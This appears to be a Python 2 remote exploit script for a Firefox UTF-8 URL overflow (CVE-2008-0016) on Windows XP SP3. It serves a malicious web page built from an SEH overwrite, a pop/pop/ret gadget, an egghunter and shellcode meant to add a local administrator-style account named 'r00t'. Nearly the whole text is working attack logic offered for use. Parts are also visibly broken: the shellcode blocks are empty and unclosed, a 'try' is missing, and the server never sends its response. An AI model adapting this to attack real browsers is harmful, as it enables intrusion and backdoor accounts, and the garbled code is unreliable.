# FireFox Windows XP SP3 x86 Remote Exploit
# Author: Dominic Chell <dmc@deadbeef.co.uk>
# Exploits the UTF-8 URL overflow vulnerability described in CVE-2008-0016.
# As of September 2009 there are no public exploits for this vulnerability.
# However, according to securityfocus an exploit is available in both Canvas
# and Core Impact.
# Thanks to meta and ChrisA

from BaseHTTPServer import HTTPServer 
from BaseHTTPServer import BaseHTTPRequestHandler 
import sys 

# Adduser shellcode encoded with shikata_ga_nai
# USER=r00t PASS=r00tr00t!!
egg = (

# Egghunter where egg is 0x41424142.
# The egghunter is encoded as HTML entities, this evades the unicode conversion.
# Egghunter courtesy of skape. Modified to xor edx,edx as first instruction.
shellcode = (

# The UTF-8 character in the URL triggers the code path where the overflow occurs.
s = "\xC3\xBA"
u = unicode(s, "utf-8")
utf8chars = u.encode( "utf-8" )

class myRequestHandler(BaseHTTPRequestHandler):

	def create_exploit_buffer(self):
		html = "<meta http-equiv=\"Content-Type\" content=\"text/html;charset=utf-8\" />\n<html>\n<body>\n"

		# Store the egg and adduser shellcode in CDATA
		# The egghunter will try and find this in memory
		html += "<!CDATA[" + "\x42\x41\x42\x41\x42\x41\x42\x41" + egg
		html += "]>\n"

		html += "<a href=\""
		html += "\x01"
		html += "xx://dmc"
		html += utf8chars
		html += "/"
		html += "邐" * 1700	# Windows XP SP3 SEH offset
		html += "ძ邐"	# unicode - ptr to next seh "\xeb\x10\x90\x90";
		html += "ᇧ怷"	# 0x603711e7 - pop/pop/ret - xpcom_core.dll
		html +="邐" * 10
		html += shellcode # add egghunter
		html +="邐" * 10
		html += "\" >s</a>"
		html += "\n</body>"
		html += "\n</html>"
		return html

	def do_GET(self):
		if self.path == "/":
			html = self.create_exploit_buffer()
			print "[*] Evil payload sent\n[*] Wait a few minutes and try connecting with r00t/r00tr00t!!\n"
	def printCustomHTTPResponse(self, respcode):
		self.send_header("Content-type", "text/html")
		self.send_header("Server", "myRequestHandler")

print "FireFox x86 Exploit\nAuthor: dmc@deadbeef.co.uk\n"
print "[*] Starting evil web server"
print "[*] Waiting for clients\n"

httpd = HTTPServer(('', 80), myRequestHandler)

except KeyboardInterrupt:
	print "\n\n[*] Interupt caught, exiting.\n\n"